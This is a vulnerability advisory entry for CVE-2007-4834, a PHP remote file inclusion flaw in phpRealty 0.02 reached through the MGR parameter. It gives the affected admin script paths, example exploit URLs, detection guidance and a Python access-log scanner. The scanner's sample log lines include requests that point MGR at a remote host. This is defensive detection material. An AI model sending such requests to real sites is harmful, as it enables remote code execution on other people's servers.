CVE-2007-4834
published 2007-09-12

Priority: P3 55 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 58.50% (99.0th percentile)

Multiple PHP remote file inclusion vulnerabilities in phpRealty 0.02 allow remote attackers to execute arbitrary PHP code via a URL in the MGR parameter to (1) index.php, (2) p_ins.php, and (3) u_ins.php in manager/admin/.

Affected

1 range
Vendor | Product | Version range | Fixed in
phprealty | phprealty | - | -

Detection & IOCs (extracted from sources)

path: manager/admin/index.php
path: manager/admin/p_ins.php
path: manager/admin/u_ins.php
url: http://localhost/[ Path ]/manager/admin/index.php?MGR=[evilscript]
url: http://localhost/[ Path ]/manager/admin/p_ins.php?MGR=[evilscript]
url: http://localhost/[ Path ]/manager/admin/u_ins.php?MGR=[evilscript]
  • Detect HTTP requests targeting the MGR parameter in phpRealty admin scripts (index.php, p_ins.php, u_ins.php) under manager/admin/ with a URL value, indicative of remote file inclusion exploitation.
  • Monitor GET/POST requests to manager/admin/index.php, manager/admin/p_ins.php, or manager/admin/u_ins.php where the MGR parameter contains an external URL (http:// or https://) pointing to a remote script.
  • The vulnerability affects only phpRealty version 0.02; verify the installed version before applying detection rules to avoid false positives on other versions.
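
The detection guidance above can be applied to web server access logs. The following is an added example, not part of the original entry or of any vendor rule: it assumes combined-format log lines, and the function names, sample log lines and host names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# The three scripts named in the CVE description, all under manager/admin/.
SCRIPTS = re.compile(r"(?:^|/)manager/admin/(?:index|p_ins|u_ins)\.php$", re.I)
# A parameter value that starts with a remote URL scheme (http:// or https://).
REMOTE = re.compile(r"^\s*https?://", re.I)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def is_rfi_attempt(log_line):
    """True if the line requests an affected script with MGR set to a remote URL."""
    m = REQUEST.search(log_line)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    # Decode the path so percent-encoded script names still match.
    if not SCRIPTS.search(unquote(parts.path)):
        return False
    # parse_qs percent-decodes values, so MGR=http%3A%2F%2F... is caught too.
    # PHP parameter names are case-sensitive, hence the exact key "MGR".
    values = parse_qs(parts.query, keep_blank_values=True).get("MGR", [])
    return any(REMOTE.match(v) for v in values)

def scan(lines):
    """Return the indexes of log lines that match the detection logic."""
    return [i for i, line in enumerate(lines) if is_rfi_attempt(line)]

# Constructed sample log lines (documentation IP range, placeholder hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Sep/2007:10:00:01 +0000] "GET /realty/manager/admin/index.php?MGR=http://remote.example/x.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Sep/2007:10:00:02 +0000] "POST /realty/manager/admin/p_ins.php?MGR=https%3A%2F%2Fremote.example%2Fx HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Sep/2007:10:00:03 +0000] "GET /realty/manager/admin/u_ins.php?MGR=local_page HTTP/1.1" 200 2048',
    '198.51.100.4 - - [12/Sep/2007:10:00:04 +0000] "GET /realty/index.php?MGR=http://remote.example/x HTTP/1.1" 200 2048',
    '203.0.113.7 - - [12/Sep/2007:10:00:05 +0000] "GET /realty/manager/admin/u_ins.php?id=3&MGR=HTTP://remote.example/a HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print("possible CVE-2007-4834 attempt:", SAMPLE_LOG[i])
```

Access logs record only the query string, so an MGR value sent in a POST body needs request-body inspection (for example at a WAF or reverse proxy) to be seen.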